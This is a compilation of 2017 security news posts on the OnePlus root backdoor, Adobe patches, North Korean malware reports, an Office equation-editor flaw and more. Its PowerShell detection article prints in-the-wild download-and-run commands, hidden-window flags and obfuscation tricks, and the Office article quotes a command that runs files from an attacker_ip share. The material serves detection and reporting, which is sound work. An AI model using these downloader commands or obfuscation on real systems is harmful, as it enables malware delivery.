The DiagEnabled, which is a @Qualcomm made activity, is the best class in this EngineerMode APK. Check the methods in this activity: escalatedUp(boolean, string) sounds like a cool thing no 😀? pic.twitter.com/iQFfam6eg6

6:34 PM - Nov 13, 2017

1 1 Reply 2 2 Retweets 34 34 likes
Twitter Ads info and privacy
The problem is severe and OnePlus users must be informed that it is anyway possible to gain a root access to the device using a simple command.

root oneplus devices android hacking

The hack could be exploited by an attacker to perform several malicious activities, including the installation of a spyware or a bootkit.

The workaround to protect vulnerable OnePlus smartphones consists of disabling the root on their phones using the following command on ADB shell:

"setprop persist.sys.adb.engineermode 0" and "setprop persist.sys.adbroot 0" or call code *#8011#
Elliot Alderson plans to release an application to root the OnePlus devices.

13 Nov
Elliot Alderson @fs0c131y
Replying to @fs0c131y and 18 others
Awesome! Thanks to @insitusec and the @NowSecureMobile team, we have the password! It's now possible to root an @Oneplus device with a simple intent pic.twitter.com/gN0awYijBv

Elliot Alderson @fs0c131y
I will publish an application on the PlayStore to root your @OnePlus device in the next hours

10:57 PM - Nov 13, 2017
22 22 Replies 27 27 Retweets 154 154 likes
Twitter Ads info and privacy
OnePlus company is currently analyzing the issue.

Stay tuned!

Adobe Patch Tuesday addresses 80 flaws, 56 bugs in Reader and Acrobat
15.11.2017 securityaffairs

Adobe released today’s Patch Tuesday, a total of 80 vulnerabilities across 9 products, most of which for Acrobat and Reader, including dozens of RCE issues.
Adobe released patches for a total of 80 vulnerabilities across its products, including Flash Player, Photoshop, Connect, Acrobat and Reader, DNG Converter, InDesign, Digital Editions, Shockwave Player, and Experience Manager products.

Half of the vulnerabilities addressed with the last Adobe Patch Tuesday were discovered by experts of the Chinese firm Tencent.

The highest number of flaw (56) has been fixed in Acrobat and Reader for Windows and Mac. The patches addressed many critical uninitialized pointer access, use-after-free, buffer access, buffer over-read, buffer overflow, out-of-bounds read/write, improper array index validation, security bypass, type confusion, and untrusted pointer dereference issues that can be exploited for remote code execution.

Adobe Patch Tuesday

Adobe fixed five remote code execution by releasing updates for the Windows, Mac, Linux and Chrome OS versions of Flash Player.

The company also fixed four server-side request forgery (SSRF) and cross-site scripting (XSS) vulnerabilities in Adobe Connect, Adobe also implemented a feature to mitigate clickjacking attacks.

Adobe fixed some critical code execution issues affecting Windows and Mac versions of Photoshop CC, and Shockwave Player for Windows, the company also solved a critical memory corruption vulnerability in DNG Converter for Windows.

Adobe addressed six flaws in Digital Editions for Windows, Mac, iOS, and Android that can lead to the disclosure of memory addresses and other sensitive data.

Adobe fixed three vulnerabilities in Experience Manager, including one information disclosure bug rated moderate severity, the firm also addressed a critical remote code execution bug in Adobe InDesign.

According to Adobe, none of the vulnerabilities patched are under active attack

Go to HELL, PowersHELL : Powerdown the PowerShell Attacks
15.11.2017 securityaffairs

Powerdown the PowerShell Attacks : Harnessing the power of logs to monitor the PowerShell activities
Lately, I have been working on analyzing the PowerShell attacks in my clients’ environment. Based on the analysis and research, I have come up with a few indicators that will help to detect the potential PowerShell attacks in your environment using windows event logs. First, we will understand how PowerShell is weaponized in the attacks that are observed in the wild and then we will look at the detection mechanism.

How PowerShell is used in the attacks
As all of us are aware that PowerShell is extremely powerful and we have seen that attackers are increasingly using PowerShell in their attack methods lately. PowerShell is a default package that comes with Microsoft Windows OS and hence it is readily available on the victim machines to exploit.

“Powershell is Predominantly used as a downloader”

The most prominent use of PowerShell, that is observed in the attacks in-the-wild, is to download the malicious file from the remote locations to the victim machine and execute it using commands like Start-Porcess, Invoke-Item OR Invoke-Expression (-IEX) file OR downloading the content of the remote file directly in to the memory of the victim machine and execute it from there.

Two methods of System.net.Webclient that are prevalent in the live attacks

− (New-object System.net.webclient).DownlodFile()
− (New-object System.net.Webclient).DownloadString()
(New-object System.net.webclient).DownlodFile()

The simplest example of this method to check how it works is shown in the snapshot below. (an experiment that one can perform to check the functionality of this method by setting up a http/s server using program like Xampp )

In the example shown above, the file is downloaded to the disk as evilfile.txt at the path C:\Users\kirtar_oza\AppData\Roaming set by calling the environment variable $Appdata and then this file is executed using “Invoke-Item” command.

Following is an example from one of the attacks in the wild

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://**********.com/***/**.dat', $env:APPDATA + '\***.exe'); Start-Process $env:APPDATA'\***.exe
In above example, the remote file is downloaded using .downloadfile() method and dropped under users’ appdata directory using environment variable and “Start-Process” is used to execute the dropped binary.

The following are some more examples of the PowerShell downloads and invocation that have been seen in the wild

C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:vlbjkf
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" Invoke-Expression $env:imumnj
C:\Windows\System32\cmd.exe" /c PowerShell "'PowerShell ""function Bdabgf([String] $hcre){(New-Object System.Net.WebClient).DownloadFile($hcre,''C:\Users\***\AppData\Local\Temp\****.exe'');Start-Process ''C:\Users\****\AppData\Local\Temp\****.exe'';}try{Bdabgf(''http://*****.com/****.png'')}catch{Bdabgf(''http://*****.de/***.png'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\****\AppData\Local\Temp\*****.bat;Start-Process 'C:\Users\*****\AppData\Local\Temp\******.bat' -WindowStyle Hidden"
(New-object System.net.Webclient).DownloadString()

DownloadString() does not download any file to the disk but it copies the content of the remote file directly to the memory of the victim machine. These files typically are malicious scripts which get executed directly into the memory using Powershell –Command argument. This technique is wildly used to create so-called file-less malware where the evil script is executed directly in the memory of the victim machine without dropping any file as such on the hard disk. This technique is used to bypass signature-based detection.

The simplest example of this method to check how it works is as below

Powershell attacks

Where cmd.js is a remote script that starts calc.exe process on the victim machine without any file on the disk – runs from memory. [ Note : just write calc.exe in a notepad file and save it as .js extension]

The following snippet is from one of the attacks in the wild

powershell -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('hxxp://******** [.]com/***/**.mdf', $env:APPDATA + '\***.exe'); Start-Process $env:APPDATA'\***.exe';(New-Object System.Net.WebClient).DownloadString('hxxp://nv******[.]com/s.php?id=po**')
In above example, both of the methods have been used together – downloadstring() is used to download some php code from the remote host.

PowerShell “Flags” to make operation stealth
Attackers use a variety of options available in PowerShell to keep their operation as stealthy as possible. Following are the flags which are widely used in the attacks – and that could be used to build our list of Indicators of Compromise (IOC)

–WindowStyle hidden / -w hidden: to make PowerShell operation stealth by making program window hidden from user

–Exec Bypass: to bypass/ignore the execution policy like Restricted which restricts the PowerShell scripts from running

– Command / -c : to execute any commands from PowerShell terminal

–EncodedCommand / -e / -Enc: to pass encoded parameters as command lines

–Nop / -Noprofile : to ignore the commands in the Profile file

Examples of the various flags

You can refer the example in the previous section to understand the use of flags – -nop -Exec Bypass –Command

The following are the examples of various flags used by the attackers in the wild

C:\WINDOWS\system32\cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://****.com/Updates')
PowersHell –e <encoded input>
Powershell – Enc <encoded input>
Indicators of Compromise
Now, I will talk about the indicators of compromise that helps u to detect any suspicious PowerShell activities in the environment.

Observe the Parent-Child Relationship for the PowerShell Process
Typically, when we run PowerShell using windows start menu or from its location on the disk, it starts under explorer.exe – you can see parent-child relationship tree using Process Explorer OR Process Hacker on your system.

Powershell attacks

Powershell attacksIt looks like as shown in left – Explorere.exe is the parent process to the Powershell.exe

Most of the times, in PowerShell attacks, PowerShell script / commands launched through command line process – therefore, we usually have observed that the parent process to the Powershell Process is cmd.exe in the attacks which are in the wild.

Powershell attacks

Powershell attacksNow, there are legit cases also where cmd.exe will be the parent process for PowerShell process – like administrator wants to fire some PowerShell script and he launches powershell form command prompt (cmd.exe)

“Therefore, it is important to have a look at the Grandparent process as well like – who spawned the cmd.exe – that will give you an indication if this could be part of the attack.”

So, if the Grandparent process is winword.exe, mshta.exe, wscript.exe, wuapp.exe – then it is a fair indication that cmd.exe is spawned by a script and that script is worth to look at.

“There are cases where we have observed PowerShell Process is directly spawned by windword.exe – that is a clear indication of a suspicious activity that we need to log and investigate.”

This kind of behavior typically seen in Phishing cases where user clicked/opened the word document which has embedded macro (vbscript) in it which spawns the PowerShell process to download the malicious content from the web.

Therefore, log and pay attention to the PowerShell process if

-It is spawned by winword.exe ( its parent process is winword.exe)

-It is spawned by cmd.exe (its parent process is cmd.exe) and if cmd.exe is spawned by

winword.exe (Grandparent of PowerShell is winword.exe)





-It is spawned by any of the above processes (Its Parent is any of above process – mshta,wscript, cscript, wuapp, tasking etc. )

Have a look at the following snippet from Process Monitor that shows Process Creation order after the sample script is executed – PowerShell is executed by Wscript.exe – that means Wscript.exe is a parent process for PowerShell and PowerShell is in-turn the Parent process for conshost.exe which spawns the calc.exe.

Powershell attacks

Sample Script is as below – copy these 2 lines of code in Notepad and save it as .js and run it

shell = new ActiveXObject('WScript.Shell');
shell .Run("powershell.exe Invoke-Item c:\\windows\\system32\\calc.exe");
The indicators discussed above are indicative and by no means, it is a comprehensive set of relationships but this can be a good starting point form where we can start logging PowerShell execution in the environment and then focus on above IOCs to investigate them further for any suspicious activity.

Command-lines are king
Many of the Powershell attacks can be detected by just monitoring command line parameters passed along with the PowerShell process. Moreover, it will help us to further investigate the incident by providing the cues on where to look next for further evidence. For example, if downlodFile() method is used – we will come to know the location on the hard disk where the malicious file might have dropped and the malicious site from where the malicious file is downloaded. We can take these clues and investigate further to assess the impact and behavior of the attack.

How can windows security eventlogs help us in detecting the PowerShell attacks?
There are multiple ways to enable logging for PowerShell based on the version of the PowerShell and operating system used.

Today, I am going to talk about the windows event code that will help us to identify the IOCs described above. By just enabling and logging this event id, it is possible to effectively detect the PowerShell attacks.

I am talking about windows security event id 4688 – Process Creation. Yes, it will generate hell lot of events but applying basic filtering techniques, we can log and monitor only the logs of interest. By default, Process Creation audit is disabled – so first and foremost, we need to enable this feature using GPO. You can read more on this here.

In addition to that – it is important to log command line parameters which are passed at the time of process creation. Command line auditing feature is made available on Microsoft starting from Windows 8.1 and Windows Server 2012 R2. We just need to enable this feature by enabling Include command line in process creation events at Administrative Templates\System\Audit Process Creation and you can roll this out using GPO. You can read more on this here.

Microsoft has come up with the update to make this feature available on its other supported versions of Windows 7, Server 2008 and Server 2008 R2. You can read more on this here and here.

Event ID 4688 will give us two key information based on which alerts can be created on the SIEM to detect such attacks.

Which process has been created
What Command line parameters/arguments are passed with the process creation (if any)
Who is the parent process (Win10/ Win 16 and later includes name of the parent process under Creator_Porcess_Name field; previous versions of windows include the Process ID of the parent process under Creator_Process_ID)
I would take an example of Splunk and explain how alerts can be created to detect the suspicious PowerShell activities in your environment. I will also mention caveats associated with the alert.

First of all, we are interested in capturing Powershell attacks so we need to monitor the events where Powershell.exe is created or spawned. Typicall, 4688 Event ID looks like following – that includes the field called “New_Process_Name” – that gives information about which process is created.

Powershell attacks

So, we need to pick-up those events by following search

index=win_sec EventCode=4688 New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Next step is to review the command line arguments passed with Powershell Process initiation.

Process_Command_Line gives information about the command line parameters that are passed to the newly created process – i.e. Powershell. We can create the alert based on the frequently used parameters like –e, -Encod, -windowstyle , Bypass , -c , -command etc.

index=win_sec EventCode=4688 New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe –c OR –Encode OR -e, OR – windowstyle
Better option is to create the input lookup list for the known suspicious command line arguments and lookup against that in your alert.

Starting with Windows 10 and Windows Server 2016 – Microsoft has added a field called “Creator Process Name” in Event Id 4688 which gives the name of the Parent Process. This filed helps to create the alerts based on the suspicious parents.

index=win_sec EventCode=4688
New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Creator_Process_Name= C:\Program Files\Microsoft Office\Office15\winword.exe
New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Creator_Process_Name= C:\windows\system32\mshta.exeNew_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Creator_Process_Name= C:\windows\system32\cmd.exe
“Unfortunately, PowerShell commands / scripts are easy to obfuscate.”

There are many ways by which the PowerShell scripts can be obfuscated. Random variables or string concatenation can be introduced in the PowerShell that can easily fool static comparison between command lines with the input lookup (as shown above). The following are few obfuscation methods that can render our static comparison ineffective.

Three is an excellent research article on PowerShell Attack Methods by Symantec THE INCREASED USE OF POWERSHELL IN ATTACKS which includes excellent examples of obfuscation taken from a Derbycon 2016 talk by Daniel Bohannon on Powershell obfuscation. Following are a few examples of obfuscation, out of many discussed in this paper

Mixed upper and lower case letters can be used, as commands are not case sensitive.
Example: (neW-oBjEct system.NeT.WeBclieNT). dOWNloadfiLe

Strings can be concatenated, including from variables, allowing for single or double quotes.
Example: (New-Object Net.WebClient). DownloadString(“ht”+’tp://’+$url)

With the exception of the 14 special cases, the escape character ` can be used in front of a character with no change in the result. A similar trick can be used with the escape character ^ when starting PowerShell from cmd.exe.
Example: (new-object net. webclient).”d`o`wnl`oa`dstr`in`g”($url)

Some arguments can be replaced with their numerical representation.
Example: “-window 1” instead of “-window hidden”

However, it is important to monitor the PowerShell execution in your environment and if the command lines are obfuscated, the chances are very high that it is run as a part of the cyber-attack. Hence, it is imperative to log Event ID 4688 – you may apply filter to log only PowerShell process creation and monitor the command line arguments passed with each PowerShell process creation.

So till next time – KEEP CALM and STAY VIGILANT !!!

US DHS and FBI share reports on FALLCHILL and Volgmer malware used by North Korean Hidden Cobra APT
15.11.2017 securityaffairs BigBrothers

US DHS published the details of the malware FALLCHILL and Volgmer used by the APT group Hidden Cobra that is linked to the North Korean government.
The US Department of Homeland Security (DHS) published the details of the hacking tool FALLCHILL used one of the APT group linked to the North Korean government tracked as Hidden Cobra (aka Lazarus Group).

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems. Security researchers discovered that North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was behind, other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Picture hack.

In June, the United States Computer Emergency Readiness Team (US-CERT) issued a technical alert about the activity of the North Korea’s ‘Hidden Cobra’ APT group.

Many experts believe the WannaCry ransomware was developed by the Lazarus Group due to similarities in the attack codes. UK Government also linked the WannaCry attack that crippled NHS to North Korea.

The DHS and FBI issued a joint alert that reveals a remote administration tool (RAT) known as FALLCHILL was used by the North Korean hackers to target companies in the aerospace, finance, and telecommunications sectors.

“Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a remote administration tool (RAT) used by the North Korean government—commonly known as FALLCHILL.” states the report.

“According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies. “

The US experts identified 83 network nodes in the FALLCHILL infrastructure, including countries in which the infected IP addresses are registered.

The report includes a list of indicators of compromise (IOCs), Network Signatures associated with the threat and Yara rules for its detection.

north korea

The US DHS also published a separate report on another threat, the Volgmer Trojan used by the North Korean government. The Volgmer is a backdoor Trojan “designed to provide covert access to a compromised system,” it has been used since 2013.

“Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. Since at least 2013, HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government, financial, automotive, and media industries.” states the report.

“It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections; however, HIDDEN COBRA actors use a suite of custom tools, some of which could also be used to initially compromise a system. Therefore, it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer”

This second report also includes details of the infrastructure associated with the malware and IoCs.

The DHS tracked at least 94 static IP addresses along with dynamic IP addresses registered across various countries, most of them in India (772 IPs – 25.4 percent), Iran (373 IPs – 12.3 percent), and Pakistan (343 IPs – 11.3 percent).

The Volgmer malware was used by Pyongyang in attacks against the government, financial, automotive, and media industries since at least 2013, The threat was delivered via spear-phishing emails.

The DHS warned of the Hidden Cobra availability of a suite of custom tools that the North Korean hackers used to hack into the companies.

17-Year-Old MS Office flaw CVE-2017-11882 could be exploited to remotely install malware without victim interaction
15.11.2017 securityaffairs

Ops, a 17-Year-Old flaw in MS Office, tracked as CVE-2017-11882, could be exploited by remote attackers to install a malware without user interaction.
Ops, a 17-Year-Old vulnerability in MS Office could be exploited by remote attackers to install a malware without user interaction.
The flaw is a memory-corruption issue that affects all versions of Microsoft Office released in the past 17 years, including the latest Microsoft Office 365. The vulnerability could be triggered on all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

The vulnerability, tracked as CVE-2017-11882, was discovered by the security researchers at Embedi, it affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.

The component fails to properly handle objects in the memory, a bug that could be exploited by the attacker to execute malicious code in the context of the logged-in user.

The EQNEDT32.EXE component was introduced in Microsoft Office 2000 seventeen years ago and affects Microsoft Office 2007 and later because the component was maintained to maintain the backward compatibility.


To exploit the vulnerability, an attacker needs to trick victims into opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.
The attacker can gain full control on the target system by chaining the vulnerability with Windows Kernel privilege escalation exploits like CVE-2017-11847.

Researcher at Embedi researchers described several attack scenarios :

“By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it).” states the analysis published by Embedi.

“One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker.”

“Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient.”

“After that an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service.”

Microsoft has addressed the vulnerability with the November Patch Tuesday release, the tech giant has changed the way the affected component handles objects in memory.

The experts warn of the presence of many security issued in this vulnerable Office component and suggest disabling it to avoid problems.

To disable the component it is very simple, just type the following command in the command prompt:

reg add “HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

For 32-bit Microsoft Office package in x64 OS, the command to run is:

reg add “HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

Microsoft users should also enable Protected View to prevent active content execution (OLE/ActiveX/Macro).

Windows Defender Immune to AVGater Quarantine Flaw: Microsoft
14.11.2017 securityweek

A recently disclosed vulnerability that allows an attacker to abuse the quarantine feature of anti-virus products to escalate privileges doesn’t affect Windows Defender, Microsoft says.

Dubbed AVGater, the new attack method relies on a malicious DLL being quarantined by an anti-virus product and then abuses the security program’s Windows process to restore the file.

Because the anti-virus process typically has System permissions, the malicious file is written to a different location (such as the Program Files or Windows folders) than its initial folder, so it could run with higher privileges.

This is possible because of a type of file link called junction, which allows for the writing of the restored file anywhere on the hard drive on NTFS file systems. Now written to a folder from which a privileged Windows process is launched, the malicious DLL is executed first, due to how the operating system works.

“To exploit this vulnerability, malicious applications, including those launched by user-level accounts without administrator privileges, create an NTFS junction from the %System% folder to folder where the quarantined file is located. This NTFS junction can trigger the antivirus product to attempt to restore the file into the %System% folder,” Microsoft explains.

Discovered by Florian Bogner, information security auditor at Austria-based Kapsch, the bug was said to affect products from a large number of anti-virus makers. However, only Trend Micro, Emsisoft, Kaspersky Lab, Malwarebytes, Check Point (ZoneAlarm) and Ikarus were named, as they have already patched the issue.

In a blog post, Microsoft underlines the fact that Windows Defender is not affected by the AVGater flaw, which requires a non-administrator-level account to perform a restore of a quarantined file.

According to Microsoft, the vulnerability represents a relatively old attack vector, but “Windows Defender Antivirus has never been affected by this vulnerability because it does not permit applications launched by user-level accounts to restore files from quarantine.”

The tech giant explains that this design feature was meant as a built-in protection and that the security application includes similar safety measures against other known user-account permissions vulnerabilities as well.

Medigate Emerges From Stealth With Medical Device Firewall
14.11.2017 securityweek Safety

Israel-based startup Medigate emerged from stealth mode on Tuesday with a firewall designed specifically for protecting medical devices, and more than $5 million in seed funding.

Healthcare organizations have been increasingly targeted in the past few years, including in ransomware attacks and operations whose goal was to obtain sensitive medical information. Experts have often also warned about the possibility of attacks aimed at disrupting medical treatment.

While medical devices are increasingly connected, protecting them against cyber threats requires a different approach compared to common IT systems. Applying software patches and installing traditional endpoint security solutions on medical systems can cause disruptions, which is why these devices often remain vulnerable and serve as key pivot points within the targeted organization’s network, as shown by the MEDJACK attacks.

Medigate aims to address this problem with a dedicated platform for securing medical devices that are connected to electronic medical records, device servers, other enterprise systems, and even the Internet.

Using knowledge of the medical workflow, Medigate’s firewall solution provides complete visibility into all devices on the network and allows organizations to quickly identify anomalies and suspicious activity. In addition to detecting threats, the product also blocks malicious communications to prevent any damage, Medigate said.

The firewall sits between the medical devices and the servers they communicate with in an effort to prevent attackers from taking control of this part of the network.


“Because it is not possible to effectively deploy endpoint security solutions and regular security patches to these devices, they significantly increase the exposure in my organization’s overall risk posture,” said Heath Renfrow, U.S. Army Medicine CISO. “A product like Medigate would add a much necessary layer of defense, significantly reducing the risk of medical device vulnerabilities to my networks.”

Medigate’s solution is currently available to a limited number of qualified organizations, but it’s expected to become generally available in mid-2018.

Medigate has raised $5.35 million in a seed funding round led by YL Ventures, a seed-stage venture capital firm that invests in Israeli innovations, with participation from early-stage VC company Blumberg Capital.

The Disconnect Between Security Perception and Security Reality
14.11.2017 securityweek Security
A new global survey highlights the disconnect between security expectations and security reality for many IT/security professionals.

There is an awareness of the likelihood of security attacks (45% of respondents expect one within the next 12 months). There is ongoing empirical evidence of the failure of security professionals to stop these attacks -- most recently with Equifax. Despite this, 89% of survey respondent believe they are in a good position to protect themselves from attack.

The survey report (PDF), 'Security Practices and Expectations Following the World's Biggest Breach' (Equifax) was published on Monday by Varonis. Five hundred IT and security professionals with personal responsibility for security were questioned between September 28 - October 6, 2017. Two hundred are located in the U.S., with 100 in each of the UK, France and Germany. All work for companies with more than 1,000 employees from within a variety of different vertical industry sectors.

SecurityWeek asked Matt Lock, director of sales engineers at Varonis, why there should be this difference between expectation and reality. One often-quoted possibility is the Optimism Bias (Wikipedia) -- the hard-coded biological instinct that bad things happen to other people, not to me.

Lock doesn't feel that the survey sheds any light on the reasons for the disconnect, merely that it exists. From a personal stand-point he points to over-confidence and possibly a lack of visibility into their own networks. On the former, he commented, "Some really do feel they are completely prepared and have figured out how to keep their organizations safe. In 2017, many well-respected organizations, which would seem to have the resources to ward off cyberattacks, fell victim to breaches and ransomware. Was over-confidence to blame?"

For the latter, he wonders if track-record might be a contributing factor: professionals who don't believe they have been breached might believe "that what they're doing must be working. The reality, however, might be that they have been breached but just don't know it."

Nevertheless, despite the confidence in their ability to resist future attacks, around 25% of the respondents confirmed that their organization had experienced data loss, data theft or ransomware during the last two years. This was highest in Germany, where 34% of respondents reported that their organization had been a victim of ransomware.

The perceived ability to resist attacks is not the only surprising detail to come from the survey. Given the relative imminence of GDPR next year, and the common perception that many companies are still not GDPR-compliant, it would be unsurprising to see 'compliance' as an issue of concern.

This is not shown in practice. In the US, compliance ranks only third in concerns for 2018 (behind data theft and data loss). In the UK it ranks fifth, behind the extra concerns for ransomware and cloud issues, while in neither France nor Germany does it rank anywhere in the top five concerns for next year.

"One possible explanation," Lock told SecurityWeek, "is that the U.S. is reacting more strongly towards GDPR because there hasn't been a regulation quite as stringent in place save for a few highly regulated industries. The attitude in UK, France, and Germany may be that GDPR is just a new spin on the current EU Data Protection Directive (DPD)."

However, he suggests this might change once GDPR starts to be enforced. One possibility is that organizations believe that 2018 will be a bedding-in period for the regulations, and they won't be enforced before 2019. He also suggests that top-of-mind for security professionals could be their most recent fire-fight. "In many ways," he suggested, "security professionals are fighting the last fight; they may be focusing their attention on ransomware and wipers, rather than looking ahead to the GDPR."

A further surprising detail comes in the rate of cyberattack experience. A common perception is that the U.S. experiences more attacks than Europe. There are two reasons -- firstly, it is simply a fact because of the degree of IT reliance in North American business; and secondly, the more stringent breach notification laws current in America make breach reporting more common than in Europe; that is, Europe doesn't report all of the attacks it experiences.

However, this perception is reversed by the survey respondents. Twenty-three percent of U.S. organizations have experienced the loss or theft of company data over the last few years; but this figure rises to 29% in Europe.

"The results are surprising," comments Lock; "and this survey gives us a peek behind the curtain. The figures in the survey suggest there's no correlation, and that organizations are being hit in greater numbers than we previously thought -- possibly they are simply keeping that information to themselves to avoid negative publicity. We may see a notable increase in reported attacks once GDPR kicks in. The results suggest the problem could be much worse than we realize."

Cloudflare Acquires Mobile App Specialist Neumob
14.11.2017 securityweek Mobil

Website performance optimization and security firm Cloudflare has expanded its reach to mobile with the acquisition of Neumob. The agreement brings Cloudflare's global optimization network to mobile apps built with the Neumob SDK. Financial details were not disclosed.

Sunnyvale, Calif.-based Neumob is a firm predicated on improving the performance of mobile computing. Poorly designed apps and the inherent latency of mobile computing mean that one of the most dynamic areas of the internet is also the slowest. Neumob addresses this issue with an SDK aimed at app developers. Its unique selling point is that even slight improvements in internet performance increase user retention and customer conversion.

The Neumob SDK improves load times and in-app performance by 30% to 300%, and reduces app errors and timeouts by up to 90%. It also significantly reduces bandwidth usage and data fees. "We have a purpose-built solution for the first, middle and last miles traveled in every session," explains the company on its website. The Neumob SDK is the world's first end-to-end accelerator for app owners and developers. It provides a mobile app with instant access to acceleration and error reduction features at all stages of the mobile delivery process -- the first mile, middle mile and last (mobile) mile."

The weakness is the 'middle mile' -- the internet itself. Neumob has sought to remedy this with the development of its own network of points of presence (POPs) -- 164 in 95 metropolitan areas across 6 continents. It's a start, but hardly a global network.

Cloudflare has that global network: 118 data centers in 58 countries with more than 7 million domains that already routes 10% of all HTTP/HTTPS Internet traffic. It also has the technology to move data across the internet with optimum performance. Argo, for example, analyzes the performance of network paths to route traffic across the fastest available paths. It maintains open secure communications and eliminates the latency of connection setup.

The combination of Neumob and Cloudflare will benefit both parties. "We've long needed a global network running at the edge to fully realize the technology we've created at Neumob," said Jeff Kim, co-founder of Neumob. "Now that we're a part of the Cloudflare team, we have a tremendous opportunity to engage with Cloudflare's customers and improve the mobile experience for users around the world."

"Cloudflare's mission is to help build a better Internet -- we mean that literally," said Matthew Prince, co-founder and CEO of Cloudflare. "With Neumob, we're now able to reach the last-mile of connectivity and provide the fastest and most secure experience possible for users everywhere, on any device."

Neumob was founded in 2015. It raised $10.9 in the same year -- $2.3 million in seed funding followed by $8.5 million in a Series A round led by Accel Partners.

San Francisco, CA-based Cloudflare was founded in 2009. It has raised a total funding amount of $182,050,000 -- the most recent being $110 million Series D funding led by Fidelity Investments in September 2015. It routes traffic through its own global network, blocking DoS attacks, reducing spam and improving performance.

Earlier this year, Cloudflare collaborated with Flashpoint, Akamai and RiskIQ in a cross-vendor project to neutralize the newly emerging WireX botnet.

Freedom of the Net report – Manipulating Social Media, hacking election and much more
14.11.2017 securityweek BigBrothers

Freedom of the Net report – Online manipulation played a crucial role in elections in at least 18 countries over the past year, including the United States.
While cyber security experts still debate cyber attacks against 2016 Presidential Election, according to the independent watchdog Freedom House at least 18 countries had their elections hacked last year.

The group surveyed 65 nation states comprising 87 percent of internet users and observed that in at least 18 cases, foreign governments or outside bodies had tried to influence an election by restricting or interfering with internet use.

According to the organization, Governments around the world are dramatically increasing their efforts to manipulate information on social media, threatening the notion of the internet as a liberating technology, this is the message emerged from annual Freedom of the Net report.

“The use of paid commentators and political bots to spread government propaganda was pioneered by China and Russia but has now gone global,” said Michael Abramowitz, president of Freedom House. “The effects of these rapidly spreading techniques on democracy and civic activism are potentially devastating.”

While in some cases the interference attempts were performed by foreign actors, in the majority of the cases they were carried out either by the local government or opposition. The watchdog reported that 30 countries have now been found to be running armies of trolls to try and influence public sentiments on specific topics.

“Venezuela, the Philippines, and Turkey were among 30 countries where governments were found to employ armies of “opinion shapers” to spread government views, drive particular agendas, and counter government critics on social media.” states the report. “The number of governments attempting to control online discussions in this manner has risen each year since Freedom House began systematically tracking the phenomenon in 2009.”

Chined Government is the most active in this sense, it used a cyber army composed of bloggers and social media users who support its politics and discredit political opponents. Unfortunately, China isn’t the only one, in Russia, the Internet Research Agency is the “troll farm” reportedly financed by a businessman with close ties to President Vladimir Putin.

Unlike other methods of censorship, the online content manipulation is very difficult to detect and combat, the countering content manipulation takes time and resources.

“Not only is this manipulation difficult to detect, it is more difficult to combat than other types of censorship, such as website blocking, because it’s dispersed and because of the sheer number of people and bots deployed to do it,” said Sanja Kelly, director of the Freedom on the Net project. “The fabrication of grassroots support for government policies on social media creates a closed loop in which the regime essentially endorses itself, leaving independent groups and ordinary citizens on the outside.”

Freedom of the Net report

Giving a look at other data in the report, Freedom House classified only 23 percent of the internet as “free.”

Freedom of the Net Freedom House image

14 countries this year passed laws to restrict the internet use, in some cases, Governments banned the use of VPNs, 19 countries have used some kind of internet shutdown during political events.

The report also warns of physical attacks on netizens and online journalists spread globally, in 8 countries (including Brazil, Mexico, Pakistan, and Syria) journalists or online commentators have been killed for their online activities.

According to the Freedom of the Net report the things will get worse in the future.

IcedID, a new sophisticated banking Trojan doesn’t borrow code from other banking malware
14.11.2017 securityweek

Researchers at IBM have spotted a new banking malware dubbed IcedID has capabilities similar to other financial threats like Gozi, Zeus, and Dridex.
Malware researchers at IBM X-Force have spotted a new strain of banking malware dubbed IcedID has capabilities similar to other financial threats like Gozi, Zeus, and Dridex. IcedID does not borrow code from other banking malware, but it implements comparable features.
